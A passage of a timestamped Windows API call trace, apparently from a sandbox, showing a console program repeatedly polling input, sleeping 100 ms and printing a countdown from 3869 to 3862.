[0217.239] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0217.239] Sleep (dwMilliseconds=0x64)
[0217.348] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.348] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0217.348] Sleep (dwMilliseconds=0x64)
[0217.458] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.458] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0217.458] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083869") returned 8
[0217.458] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0217.458] __iob_func () returned 0x757a2900
[0217.458] _fileno (_File=0x757a2920) returned 1
[0217.458] _errno () returned 0x5507d8
[0217.458] _get_osfhandle (_FileHandle=1) returned 0x4c
[0217.458] _errno () returned 0x5507d8
[0217.458] GetFileType (hFile=0x4c) returned 0x2
[0217.458] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0217.458] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0217.458] lstrlenW (lpString="\x08\x08\x08\x083869") returned 8
[0217.567] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.567] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0217.567] Sleep (dwMilliseconds=0x64)
[0217.676] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.676] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0217.676] Sleep (dwMilliseconds=0x64)
[0217.785] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.785] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0217.785] Sleep (dwMilliseconds=0x64)
[0217.894] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.894] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0217.894] Sleep (dwMilliseconds=0x64)
[0218.003] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.004] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0218.004] Sleep (dwMilliseconds=0x64)
[0218.113] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.113] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0218.113] Sleep (dwMilliseconds=0x64)
[0218.232] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.232] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0218.232] Sleep (dwMilliseconds=0x64)
[0218.331] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.331] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0218.331] Sleep (dwMilliseconds=0x64)
[0218.440] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.440] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6034
[0218.441] Sleep (dwMilliseconds=0x64)
[0218.550] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.550] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0218.550] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083868") returned 8
[0218.550] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0218.550] __iob_func () returned 0x757a2900
[0218.550] _fileno (_File=0x757a2920) returned 1
[0218.550] _errno () returned 0x5507d8
[0218.550] _get_osfhandle (_FileHandle=1) returned 0x4c
[0218.550] _errno () returned 0x5507d8
[0218.550] GetFileType (hFile=0x4c) returned 0x2
[0218.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0218.550] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0218.550] lstrlenW (lpString="\x08\x08\x08\x083868") returned 8
[0218.659] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.659] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0218.659] Sleep (dwMilliseconds=0x64)
[0218.768] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.768] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0218.768] Sleep (dwMilliseconds=0x64)
[0218.877] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.877] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0218.877] Sleep (dwMilliseconds=0x64)
[0218.986] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0218.986] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0218.986] Sleep (dwMilliseconds=0x64)
[0219.096] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.096] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0219.096] Sleep (dwMilliseconds=0x64)
[0219.205] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.205] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0219.205] Sleep (dwMilliseconds=0x64)
[0219.329] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.330] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0219.330] Sleep (dwMilliseconds=0x64)
[0219.441] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.442] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6035
[0219.442] Sleep (dwMilliseconds=0x64)
[0219.579] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.579] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6036
[0219.579] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083867") returned 8
[0219.579] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0219.579] __iob_func () returned 0x757a2900
[0219.579] _fileno (_File=0x757a2920) returned 1
[0219.579] _errno () returned 0x5507d8
[0219.580] _get_osfhandle (_FileHandle=1) returned 0x4c
[0219.580] _errno () returned 0x5507d8
[0219.580] GetFileType (hFile=0x4c) returned 0x2
[0219.580] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0219.580] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0219.580] lstrlenW (lpString="\x08\x08\x08\x083867") returned 8
[0219.705] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.706] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6036
[0219.706] Sleep (dwMilliseconds=0x64)
[0219.844] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.844] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6036
[0219.844] Sleep (dwMilliseconds=0x64)
[0219.985] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0219.985] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6036
[0219.985] Sleep (dwMilliseconds=0x64)
[0220.125] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0220.125] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6036
[0220.125] Sleep (dwMilliseconds=0x64)
[0220.284] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0220.284] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6036
[0220.284] Sleep (dwMilliseconds=0x64)
[0220.437] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0220.437] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6036
[0220.437] Sleep (dwMilliseconds=0x64)
[0220.593] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0220.593] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6037
[0220.593] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083866") returned 8
[0220.593] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0220.594] __iob_func () returned 0x757a2900
[0220.594] _fileno (_File=0x757a2920) returned 1
[0220.594] _errno () returned 0x5507d8
[0220.594] _get_osfhandle (_FileHandle=1) returned 0x4c
[0220.594] _errno () returned 0x5507d8
[0220.594] GetFileType (hFile=0x4c) returned 0x2
[0220.594] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0220.594] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0220.594] lstrlenW (lpString="\x08\x08\x08\x083866") returned 8
[0220.780] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0220.780] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6037
[0220.780] Sleep (dwMilliseconds=0x64)
[0220.968] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0220.968] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6037
[0220.968] Sleep (dwMilliseconds=0x64)
[0221.155] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0221.155] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6037
[0221.155] Sleep (dwMilliseconds=0x64)
[0221.342] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0221.343] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6037
[0221.343] Sleep (dwMilliseconds=0x64)
[0221.529] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0221.529] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6038
[0221.529] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083865") returned 8
[0221.529] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0221.529] __iob_func () returned 0x757a2900
[0221.529] _fileno (_File=0x757a2920) returned 1
[0221.529] _errno () returned 0x5507d8
[0221.530] _get_osfhandle (_FileHandle=1) returned 0x4c
[0221.530] _errno () returned 0x5507d8
[0221.530] GetFileType (hFile=0x4c) returned 0x2
[0221.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0221.530] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0221.530] lstrlenW (lpString="\x08\x08\x08\x083865") returned 8
[0221.716] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0221.716] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6038
[0221.716] Sleep (dwMilliseconds=0x64)
[0221.888] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0221.888] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6038
[0221.888] Sleep (dwMilliseconds=0x64)
[0222.075] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0222.075] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6038
[0222.075] Sleep (dwMilliseconds=0x64)
[0222.227] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0222.227] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6038
[0222.227] Sleep (dwMilliseconds=0x64)
[0222.356] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0222.356] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6038
[0222.356] Sleep (dwMilliseconds=0x64)
[0222.496] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0222.496] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0222.496] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083864") returned 8
[0222.496] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0222.497] __iob_func () returned 0x757a2900
[0222.497] _fileno (_File=0x757a2920) returned 1
[0222.497] _errno () returned 0x5507d8
[0222.497] _get_osfhandle (_FileHandle=1) returned 0x4c
[0222.497] _errno () returned 0x5507d8
[0222.497] GetFileType (hFile=0x4c) returned 0x2
[0222.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0222.497] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0222.497] lstrlenW (lpString="\x08\x08\x08\x083864") returned 8
[0222.623] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0222.623] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0222.623] Sleep (dwMilliseconds=0x64)
[0222.761] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0222.762] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0222.762] Sleep (dwMilliseconds=0x64)
[0222.884] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0222.884] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0222.884] Sleep (dwMilliseconds=0x64)
[0223.021] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.021] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0223.021] Sleep (dwMilliseconds=0x64)
[0223.120] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.121] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0223.121] Sleep (dwMilliseconds=0x64)
[0223.229] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.230] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0223.230] Sleep (dwMilliseconds=0x64)
[0223.339] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.340] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0223.340] Sleep (dwMilliseconds=0x64)
[0223.448] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.448] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6039
[0223.448] Sleep (dwMilliseconds=0x64)
[0223.557] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.557] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0223.557] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083863") returned 8
[0223.557] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0223.557] __iob_func () returned 0x757a2900
[0223.558] _fileno (_File=0x757a2920) returned 1
[0223.558] _errno () returned 0x5507d8
[0223.558] _get_osfhandle (_FileHandle=1) returned 0x4c
[0223.558] _errno () returned 0x5507d8
[0223.558] GetFileType (hFile=0x4c) returned 0x2
[0223.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0223.558] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0223.558] lstrlenW (lpString="\x08\x08\x08\x083863") returned 8
[0223.666] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.667] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0223.667] Sleep (dwMilliseconds=0x64)
[0223.775] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.776] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0223.776] Sleep (dwMilliseconds=0x64)
[0223.885] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.885] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0223.885] Sleep (dwMilliseconds=0x64)
[0223.994] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0223.994] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0223.994] Sleep (dwMilliseconds=0x64)
[0224.103] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.103] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0224.103] Sleep (dwMilliseconds=0x64)
[0224.223] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.223] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0224.223] Sleep (dwMilliseconds=0x64)
[0224.321] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.322] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0224.322] Sleep (dwMilliseconds=0x64)
[0224.431] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.431] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603a
[0224.431] Sleep (dwMilliseconds=0x64)
[0224.540] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.540] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0224.540] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083862") returned 8
[0224.540] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0224.540] __iob_func () returned 0x757a2900
[0224.540] _fileno (_File=0x757a2920) returned 1
[0224.540] _errno () returned 0x5507d8
[0224.540] _get_osfhandle (_FileHandle=1) returned 0x4c
[0224.540] _errno () returned 0x5507d8
[0224.540] GetFileType (hFile=0x4c) returned 0x2
[0224.541] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0224.541] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0224.541] lstrlenW (lpString="\x08\x08\x08\x083862") returned 8
[0224.649] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.649] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0224.649] Sleep (dwMilliseconds=0x64)
[0224.758] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.759] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0224.759] Sleep (dwMilliseconds=0x64)
[0224.869] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.870] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0224.870] Sleep (dwMilliseconds=0x64)
[0224.977] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0224.977] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0224.977] Sleep (dwMilliseconds=0x64)
[0225.086] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.086] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0225.086] Sleep (dwMilliseconds=0x64)
